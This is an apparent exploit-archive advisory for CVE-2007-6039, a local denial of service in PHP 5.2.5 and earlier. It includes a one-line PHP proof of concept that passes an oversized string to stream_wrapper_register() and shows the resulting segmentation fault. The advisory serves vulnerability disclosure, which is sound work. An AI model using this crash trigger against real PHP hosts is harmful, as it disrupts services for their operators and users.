PHP <= 5.2.5 stream_wrapper_register() Denial of service

2007.11.15

Credit: laurent gaffie

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2007-6039

CWE: CWE-20

CVSS Base Score: 2.1/10

Impact Subscore: 2.9/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Partial

Application: PHP <= 5.2.5
Web Site: http://php.net
Platform: unix
Bug:
fonction: stream_wrapper_register()
special condition: default php-memory-limit
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
===========
1) Introduction
===========
"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."
======
2) Bug
======
stream_wrapper_register() is vulnerable to a denial of service
=====
3)Proof of concept
=====
Proof of concept example :
<?php
stream_wrapper_register("hi",str_repeat("A",8477000));//let's make sure we
trigger it !
?>
result:
root@unsafebox:~/Desktop# php shot.php
Erreur de segmentation (core dumped)
root@unsafebox:~/Desktop#
========
4)Greets
========
Benjilenoob, Ivanlef0u, la team soh, #futurezone, #soh
=====
5)Credits
=====
laurent gaffi

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

PHP <= 5.2.5 stream_wrapper_register() Denial of service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.